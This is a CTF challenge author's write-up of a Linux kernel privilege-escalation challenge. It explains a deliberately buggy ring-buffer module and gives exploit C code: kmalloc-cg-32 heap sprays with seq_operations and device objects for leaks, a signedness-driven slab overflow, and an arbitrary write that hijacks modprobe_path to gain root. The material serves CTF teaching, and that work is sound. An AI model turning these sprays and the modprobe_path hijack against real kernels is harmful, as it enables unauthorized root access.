
Ringbus: Deferred Free Across Caches (Writeup)

Overwriting modprobe_path through buggy ring buffer handlers. Official writeup for my RSTCON25 challenge.


A writeup for the challenge I contributed to RSTCON25. The objective is to escalate privileges to root using kernel heap vulnerabilities, looping bugs, and heap spraying.

Table of contents

  1. Overview
  2. Module and Exploit Considerations
  3. Environment Setup
  4. A Quick Primer on SLUB Exploitation
  5. Primitive 1: Read-after-free
  6. Primitive 2: Type-Confusion to Overflow to AAW
  7. Scan Devices and Trigger
  8. Closing Thoughts

Overview

This is the official writeup for a kernel challenge I developed for RSTCON 2025. It covers the module, environment setup, and a general overview of SLUB exploitation in case this is an unfamiliar topic. As usual, the remote runs a kernel with the module loaded, and the player must exploit the module to gain root privileges. The challenge tests your ability to obtain kernel and heap (cache) leaks from heap primitives, to spray a target object into place, and to chain other bugs into an arbitrary address write (AAW). The module simulates a serial manager that stores configuration settings and exposes operations on a list of devices. Notably, you can add many devices, and each one has its own ring buffer that can be written to (RX) and read from (TX). The goal of this challenge is to build up a primitive that hijacks modprobe_path. The dist.tar is provided in this post in case you want to follow along, and the module source is included for this challenge.

Module and Exploit Considerations

Looking at the source provided in dist.tar reveals key information about the module and considerations for exploitation. It also gives a clearer overall picture of what the module does and how it does it. Let's go over some of the structures and handlers.

  • struct devices
    • Doubly linked list of struct uart_ring. The module uses this list to select (dev_select) and add (dev_new) devices.
  • struct uart_ring
    • Stores information about a device including a head, tail, and a seek used in TX/RX. It also includes usage metadata and options configurable by ioctls.
  • get/add
    • The former returns the uart_ring given the index, the latter adds a device at the end of the devices list.
  • rx_handle
    • Copies data from userspace into selected_dev->head. The number of bytes copied is determined at runtime as follows:
      • If the length n passed in write(,,n) is less than selected_dev->len, then n is used. The handler also validates that selected_dev->len is less than RING_SIZE.
      • Otherwise, selected_dev->len is used as a fallback size.
  • tx_handle
    • Copies data from the selected device's ring buffer into a userspace buffer, one byte at a time. This uses the seek attribute and wraps back to the head when the end of the buffer is reached. If the least significant nibble of t_setting for the selected device is enabled, a re-transmission mode is turned on in which TX retries bytes that fail to copy. Otherwise, failed bytes are skipped.
  • ioctl RST
    • Resets seek and marks the selected device as not in-use.
  • ioctl LEN_SET
    • Sets the selected device's len. rx_handle compares n against this value and falls back to it when n is not smaller.
  • ioctl tx_setting
    • Sets selected_dev->t_setting.

That was quite a bit, but you need at least a general understanding of the module, its userspace interactions, and how it handles allocations relative to the attack surface exposed to userspace. From this we know a few things. We can add an arbitrary number of devices. We can read from and write into their allocations. The module itself decides whether to release a device. With that in mind, let's look at some deeper exploitation considerations that become apparent from these functions and objects.

  • rx_handle does not wrap
    • Unlike tx_handle, rx_handle will not wrap to the head if seek goes out of bounds and instead trusts the prior length validations to be safe.
  • RST deferred free
    • RST marks the selected device as no longer in use, but does not actually free it at that time. The free happens later, either when RST is called again or when RX/TX is called.
  • Cache locations
    • Both devices and uart_ring->buf are stored in kmalloc-cg-32, while the uart_ring itself is allocated in kmalloc-cg-64. Every allocation made by the module uses GFP_KERNEL_ACCOUNT, which is why these objects land in the accounted -cg caches rather than the plain kmalloc-* ones. It is important to know which caches the interesting objects live in, so that we are better prepared when we break the chains and start thrashing around in the slabs.
  • tx_handle arbitrary looping
    • A retry loop can be toggled in tx_handle by setting t_setting, causing the function to call copy_to_user continuously. The loop can also be exited at will, for example by making the user buffer writable again.
  • t_setting is an unsigned long and controllable
    • This attribute is an unsigned long and entirely user-controlled, which makes it a perfect candidate for storing a fake address (such as for an AAW!). Recall that it is a member of uart_ring, so it lives in kmalloc-cg-64.

Keep these considerations in mind as we progress through our exploit. Next we’ll talk about environment setup, feel free to skip this section if you’ve done kernel challenges before.

Environment Setup

Unlike userspace binaries, a kernel module has to be attacked inside an emulated copy of the whole kernel with the target loaded. Bugs in the module can crash the kernel, and the exploit primitives rely heavily on kernelspace and kernel objects. The local environment you build for a kernel CTF should closely mirror the one the remote server launches for you. A local solve environment consists of:

  • bzImage
    • The same kernel image being run on the remote. The image provided is non-stripped.
  • initramfs
    • The file system used by the emulation. Contains the target module and should have a modified /init to drop us in a root shell after booting. Here we can also mount a hostshare (which we will expose from qemu) so that we can directly access our exploits from our test environment without having to transfer our exploit each time.
  • A script that launches our qemu environment

From the launch script we can also toggle mitigations, for example by passing nokaslr on the kernel command line. The main things we want in our testing environment are a way to be root (so we can read /proc/kallsyms) and a way to recompile and run our exploits without transferring them over the network. All you need to modify for this is /init in the initramfs, like so:

...
mkdir /mnt/hostshare && mount -t 9p -o trans=virtio hostshare /mnt/hostshare
exec su -l root

You will need a script that decompresses the filesystem and rebuilds it with your changes to /init. You can also open a debugging port on the qemu instance with -s (shorthand for -gdb tcp::1234). Combined with the non-stripped vmlinux, which can be extracted from the bzImage using publicly available tools, this lets us launch a rooted qemu instance locally and debug it with symbols.

An example qemu launcher is given:

#!/bin/sh

qemu-system-x86_64 \
    -m 128M \
    -nographic \
    -kernel "./bzImage" \
    -append "console=ttyS0 loglevel=3 oops=panic panic=-1 pti=on kaslr" \
    -no-reboot \
    -monitor none \
    -cpu qemu64,+smep,+smap \
    -initrd "./initramfs.cpio.gz" \
    -fsdev local,security_model=passthrough,id=fsdev0,path=./src \
    -device virtio-9p-pci,id=fs0,fsdev=fsdev0,mount_tag=hostshare \
    -s

pwndbg has some easy-to-use slab commands, although they rely on symbols being present in your kernel.

A Quick Primer on SLUB Exploitation

Given that this challenge relies on heap vulnerabilities, it is worth quickly going over some SLUB exploitation. SLUB is the slab allocator the Linux kernel uses by default. A kernel heap sounds scary, but I personally find it easier than userland glibc heap exploitation. Slab allocators organize memory into caches by type and size. They lack the best-fit and first-fit searches, remaindering, chunk carving, and other complex paths that the userland heap uses to service each request optimally. The difference reflects the underlying system design. Userland programs may allocate complex, program-specific objects of unpredictable sizes, while the kernel is almost always limited to objects from the kernel and its subsystems. Grouping those objects into fixed-size caches also helps avoid fragmentation.

Check out pwn.college's series on kernel exploitation for some great resources on slab allocators and the heap-specific protections in the Linux kernel.

In this short section, we will only discuss the allocator internals and exploitation techniques necessary to complete this challenge.

kmalloc caches

kmalloc hands out objects from general-purpose caches, which can hold many different object types. There are also object-specific caches and caches selected by the allocation flags, but the general-purpose caches are shared by the entire kernel. They are organized by the size of their slots, whereas dedicated caches are separated by other factors such as object type and isolation. For example, suppose a kernel object's allocation size depends on a user-controlled attribute. If the attribute is small enough that the whole object fits in 32 bytes, the object lands in kmalloc-32. If the same object is allocated with a much larger attribute value, it might instead land in kmalloc-512!

Every slot in a cache's slabs has the same fixed size. No per-object metadata such as a chunk header is stored inline; the only thing written into a free slot is its freelist pointer.

Furthermore, unlike glibc's malloc, kmalloc does not run a complex decision flow to place a freed block among several freelists. Freed slots are simply pushed onto the head of a singly linked freelist. If you're curious about which caches are available to service allocation requests, you can read /proc/slabinfo as root.

Heap Spraying

Like any allocator, SLUB comes with its fair share of hardening. This includes obfuscation of the freelist pointers stored in freed objects (CONFIG_SLAB_FREELIST_HARDENED, the kernel's counterpart to glibc's safe linking), bounds checks on copy_to_user and copy_from_user to catch out-of-bounds copies (CONFIG_HARDENED_USERCOPY), and freelist randomization (CONFIG_SLAB_FREELIST_RANDOM). The last one is particularly relevant to us, since it means consecutive allocations are not guaranteed to return adjacent slots.

This makes use-after-free bugs harder to exploit, because we are not guaranteed that the object we want, or anything at all, sits in our victim slot. Luckily, the kernel offers a large number of objects of varying sizes, so we can reach many exploitable scenarios by simply mass-allocating a target object until one lands in our UAF'd slot. Some of these objects contain function pointers, kernel pointers, and pointers into other caches (see the List of useful kernel objects).

Lastly, slabs for different caches do not live in adjacent memory. This means I can't spray into a kmalloc-64 slot using allocations made in kmalloc-32, at least in simple scenarios. It can in fact be done deliberately; read up on the padding spray method of cross-cache attacks.

Primitive 1: Read-after-free

Now that we have a grasp on kernel heap exploitation, we can move on to our first primitive, a read-after-free. The bug combines the deferred free in RST with the copy_to_user loop, which is triggered by setting the retransmission flag in selected_device->t_setting as mentioned earlier. A check at the beginning of the TX function ensures that the selected device has not been marked free by RST. However, we can pass this check, enter the loop, and then call RST on the device while it is still being read from. From then on, TX keeps reading from selected_device->buf (now freed) in a circular fashion. Note that actually triggering the re-transmission loop requires two things: the setting must be enabled, and the userspace address provided must make copy_to_user fail. There are many ways to cause the failure, such as mprotect, madvise, or simply unmapping the buffer. We will use this vulnerability to leak a kernel address and a kmalloc-cg-64 address, so we trigger it twice in our exploit.

Before proceeding, we need to add a new device to the module, select it, and configure it so that TX retries failed copies.

char buf[64] = "Something";
// mprotect() needs a page-aligned address and malloc() does not
// guarantee one, so map leak_buf directly
leak_buf = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE,
                MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
long oob_dev; // used later

// Open and save fd
open_device();

// Device 1
// - Bad t_setting
fill_new_dev(buf);
ioctl(fd, TX_INSIST_MODE, 0x10);

  • leak_buf will be used going forward to read all leaks.
  • oob_dev will be used in the future for a different primitive.
  • fill_new_dev adds a device and then writes data to it (a device can only be read from after it has been written to at least once).
  • The last ioctl enables retransmission (since (0x10 & 0x1) != 1).

I chose to leak a kernel address first. It should not matter what order you decide for your leaks, just be sure to account for it in the remainder of the exploit. Spraying devices second is more convenient here because we use the sprayed devices to craft a later primitive. The vulnerability can be triggered in the same way and the only factor that will realistically change is what object you choose to spray into the freed slot.

seq_ops spray (Kernel Leak)

I chose to spray seq_ops to obtain the kernel leak. The first step to trigger this bug is to prepare our userspace leak_buf so that it is invalid or not writable, therefore causing copy_to_user to fail. We will then utilize a simple read thread to allow us to perform other interactions during the read loop. Here I simply use mprotect to remove permissions and then start the read thread.

// Disallow leak_buf so TX loop is triggered
mprotect(leak_buf, 0x1000, PROT_NONE);
puts("[*] Starting read thread against unmapped region");
// Read forever in a separate thread
pthread_create(&read_tx, NULL, uaf_thread, NULL);

As mentioned, the thread simply does:

void *uaf_thread(void *arg) {
 (void)arg;
 puts("[*] UAF thread");
 // Blocks in the module's TX retry loop until leak_buf is writable again
 read(fd, leak_buf, 0x1000);
 return NULL;
}

Now that we are in a read loop, we can free selected_device->buf. In the main thread, we call RST twice: the first call marks buf as not in use, and the second frees it because it is already marked. RX/TX are solely responsible for reallocating buf later if it is not in use. The reader thread has already passed the in-use check, so this gives us a read-after-free. We can take advantage of it by spraying an object into kmalloc-cg-32 (recall that buf is 32 bytes) until one lands in the freed slot and is eventually read back into leak_buf by the reader thread. I chose to spray struct seq_operations because it contains kernel pointers and lives in kmalloc-cg-32. The results clearly show that the proc_single_show symbol was leaked.

Below is the code for this leak:

/**
* Leak KASLR address by:
* - Cause a TX loop
* - Trigger deferred free using RST
* - Spray with seq_ops (contains kernel ptr)
* - Unloop and parse tx buf
*/
void kaslr_leak(void){
    int spray[spray_size];
    // Disallow leak_buf so TX loop is triggered
    mprotect(leak_buf, 0x1000, PROT_NONE);
    puts("[*] Starting read thread against unmapped region");
    // Read forever in a separate thread
    pthread_create(&read_tx, NULL, uaf_thread, NULL);
    sleep(1);
    // RST 1: Reset seek
    ioctl(fd, RST);
    // RST 2: free buf
    ioctl(fd, RST);
    puts("[+] Successfully RST");
    // Fill hole with seq_operations (kmalloc-cg-32)
    puts("[*] seq_op spray");
    for(int i = 0; i < spray_size; i++){
        spray[i] = open("/proc/self/stat", O_RDONLY | O_NOCTTY);
    }
    // Hole filled with seq_op, end TX loop
    puts("[*] Re-mapping user buffer");
    mprotect(leak_buf, 0x1000, PROT_READ | PROT_WRITE);
    pthread_join(read_tx, NULL);
    modprobe_path = parse_leak_buf(kaslr_mask, kaslr_leak_index,
                                   modprobe_path_offset);
    // Free seq_ops
    for(int i = 0; i < spray_size; i++){
        close(spray[i]);
    }
}

device spray (kmalloc-cg-64 Leak)

To craft my final primitive, I also needed a kmalloc-cg-64 leak so that I could forge a fake uart_ring. To get it, I use the same bug, but this time I spray devices. Recall that the devices list links uart_ring objects, so a sprayed list node hands me a pointer to a uart_ring directly. All of this happens in the kmalloc-cg-32 cache again, which is why I first free the seq_operations objects from the first leak. These sprayed devices will also be a useful target for a later primitive, so I keep them around after spraying.

Code:

/**
* Leak kmalloc-cg-64 address by:
* - Cause a TX loop
* - Trigger deferred free using RST
* - Spray with devices (next,prev ptrs)
* - Unloop and parse tx buf
*/
void cg_64_leak(void){
    // Start TX loop
    mprotect(leak_buf, 0x1000, PROT_NONE);
    pthread_create(&read_tx, NULL, uaf_thread, NULL);
    sleep(1);
    // RST race again
    ioctl(fd, RST);
    ioctl(fd, RST);
    ioctl(fd, RST);
    // Spray devices for kmalloc-cg-64 leak
    // Will also scan list later for AAW
    for(int i = 0; i < spray_size; i++)
    devices[i] = add_dev();
    // Hole filled with device, end TX loop
    puts("[*] Re-mapping user buffer");
    mprotect(leak_buf, 0x1000, PROT_READ | PROT_WRITE);
    pthread_join(read_tx, NULL);
    kmalloc_cg_64 = parse_leak_buf(cg_64_mask, cg_64_index,
    fake_head_offset);
}

Now we have all needed leaks.

Primitive 2: Type-Confusion to Overflow to AAW

Type Confusion

This vulnerability is in the RX path. It stems from a type confusion (really a signedness mismatch) between selected_device->len, a signed int, and the unsigned length ultimately chosen in rx_handle. We use it to pass a very large n to copy_from_user and overflow the 32-byte selected_device->buf. The steps below illustrate the issue:

  1. length checks that dev->len is less than RING_SIZE-1. Recall that dev->len is set through an ioctl and stored as a signed int, but length returns it as an unsigned long. A user can set dev->len beforehand so that it is negative. ioctls take an unsigned long argument, so you cannot pass a negative value explicitly; instead, pass a value whose low 32 bits wrap to a negative int when stored. When length is then called, the signed comparison passes, and the returned value is enormous because the negative int is converted to an unsigned long.
  2. Because the returned limit is now very large, any count passed to write() passes the dev->len comparison and is accepted.
  3. The n argument from write(,,n) is then used as the size when copying from userspace into selected_dev->buf in kmalloc-cg-32. Since we choose n, we have very granular control over the size of the overflow. We later use it to write exactly one pointer (8 bytes) out of bounds.

Slab Overflow

Recall the devices we sprayed into kmalloc-cg-32 for our kmalloc-cg-64 leak. They are excellent candidates to corrupt, because overwriting one lets us redirect a device in the devices list to a uart_ring we craft. Note that RX writes to selected_dev->head, so the address we use should point 8 bytes ahead of the address we'd like to write to. The game plan is illustrated below:

As seen here, we take advantage of this overflow to craft an AAW that overwrites modprobe_path. Using our uart_ring leak from earlier, we overwrite the (hopefully) adjacent device pointer so that it points to the leaked uart_ring+32 instead. This shifts the device so that its t_setting is treated as its head, which we will write to later. As mentioned earlier, t_setting is an unsigned long that we can set, making it a perfect address holder. We opt for the modprobe_path method here to get command execution as root. We do not know which device will be adjacent to the overflow, so before triggering it we must set up every device from the earlier spray so that any of them can be used this way. This scanning process brings us to the final section.

Scan Devices and Trigger

We have no way of knowing which device will be adjacent, or whether any device will be at all, and this is where the exploit's reliability concerns come in. Assuming we are not unlucky, every device from the earlier spray must be configured so that it gives us the final primitive. In other words, we set up each device as if it were the one adjacent to our overflow in kmalloc-cg-32. Here, I first save a device to use for the overflow later. Then I scan the saved devices from earlier, updating the length so that I can copy at least 64 bytes to the location and setting t_setting so that it points to our calculated modprobe_path.

/**
* Arbitrary Write
*/
oob_dev = add_dev();
// Configure all devices as if they landed adjacently to oob_dev
// - len = 64
// -- So we can RX plenty of data into uart_ring->head
// - t_setting = &modprobe_path
// -- This is so we can use t_setting as a fake uart_ring->head
for(int i = 0; i < spray_size; i++){
    select_dev(devices[i]);
    len_set(64);
    ioctl(fd, TX_INSIST_MODE, modprobe_path);
}

After this is complete, I can use the overflow, and then write my fake modprobe path to each device in the list.

// Trigger length integer overflow
// - length() will return dev->len (int) as an unsigned long
// -- Magic number below will wrap so that dev->len is negative
// - Since arg0 (from write arg) < arg1 (len_set) arg0 is used
// - Can call write w/ arbitrary length argument
select_dev(oob_dev);
len_set(5368324604406717569);
// Payload
// - Padding
// -- Recall RING_SIZE = 32
// - Fake uart_ring
// -- Misalign uart_ring leak from earlier so that
// -- uart_ring->head points to t_settings (RX writes to head)
int offset = 32;
char payload[offset+8];
memset(payload, 0x41, offset);
memcpy(payload+offset, &kmalloc_cg_64, sizeof(kmalloc_cg_64));
write(fd, payload, sizeof(payload));
// Scan AAW
// - One of these devices is hopefully adjacent to oob_dev
// - Send "/tmp/e" to all devices until modprobe_path is overwritten
// - "/tmp/e" will be our fake modprobe binary
// - Use an 8-byte NUL-padded array: writing 8 bytes from the 7-byte
//   string literal "/tmp/e" would read past its end
char path[8] = "/tmp/e";
for(int i = 0; i < spray_size; i++){
    select_dev(devices[i]);
    write(fd, path, sizeof(path));
}
// Hopefully that worked
// Attempt modprobe_path hijack
get_flag();

Final solve in action:

Closing Thoughts

Although I was asked to make an embedded-themed challenge, I also really wanted to make my first kernel heap challenge. So thank you for suspending disbelief and accepting that an embedded device would run a semi-recent kernel or (more obviously) a SLUB allocator. I designed this challenge to highlight recurring themes you might run into when doing vulnerability research on kernel modules. One is how bad lifetime management (deferred frees plus race windows) compounds into powerful primitives when paired with general allocator exploitation techniques such as heap spraying. The intended exploit path is deliberately layered and sequential: leak, spray, type confusion, overflow, and finally AAW.

Other exploitation scenarios to consider (and perhaps try; reach out if you do) could use only the first leak primitive. One could break SLUB's freelist pointer hardening (its version of safe linking) by reading both a non-NULL and a NULL freelist pointer from the same slab, which would allow linking in a fake object. A player also told me how they used solely the first primitive, causing a kernel panic to leak the flag (the initramfs can be found by scanning memory under qemu). Below is that conversation.

If you enjoyed this challenge, you may like digging into:

  • Looking at some real CVEs in Linux subsystems, a lot of which use heap spraying.
  • pwn.college’s kernel exploitation material.
  • More interesting writeups that touch on bypassing other mitigations and cross-cache attacks.

Good luck and happy pwns!

This post is licensed under CC BY 4.0 by the author.